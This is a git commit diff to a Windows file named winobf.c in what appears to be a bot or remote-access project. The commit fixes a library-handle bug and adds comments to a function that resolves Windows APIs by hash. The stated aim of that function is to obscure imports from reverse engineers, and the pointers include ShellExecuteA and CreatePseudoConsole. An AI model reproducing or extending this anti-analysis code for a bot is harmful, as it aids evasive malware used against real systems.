Use FreeLibrary(), not CloseHandle()

2024-11-21 12:40:04 +00:00 · 2022-07-08 14:43:13 -05:00 · 2022-07-08 14:43:13 -05:00 · 4c8fef7d64
commit 4c8fef7d64
parent 4d931f28cb
1 changed files with 14 additions and 1 deletions
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
@ -86,6 +86,13 @@ void *findByHash(LPCSTR module, uint32_t hash)
    if ((hLibrary = LoadLibraryA(module)) == NULL)
        return NULL;

+    /* 
+        the rest of this function just does the same thing GetProcAddress() does, but using
+        our hash function to find the right function. this is also more obfuscated to the
+        REer, however they would probably immediately recognize what this function is doing
+        just from the LoadLibraryA() call.
+    */
+
    /* grab DOS headers & verify */
    pDOSHdr = (PIMAGE_DOS_HEADER)hLibrary;
    if (pDOSHdr->e_magic != IMAGE_DOS_SIGNATURE)
@ -120,7 +127,7 @@ void *findByHash(LPCSTR module, uint32_t hash)

 _findByHashFail:
    /* function was not found, close the library handle since we don't need it anymore */
-    CloseHandle(hLibrary);
+    FreeLibrary(hLibrary);
    return NULL;
 }

@ -131,6 +138,12 @@ _findByHashFail:
 _ShellExecuteA oShellExecuteA;
 _CreatePseudoConsole oCreatePseudoConsole;

+/* todo api:
+    ClosePseudoConsole
+    CreateProcessA
+    GetEnvironmentVariable
+*/
+
 void laikaO_init()
 {
    uint32_t hash;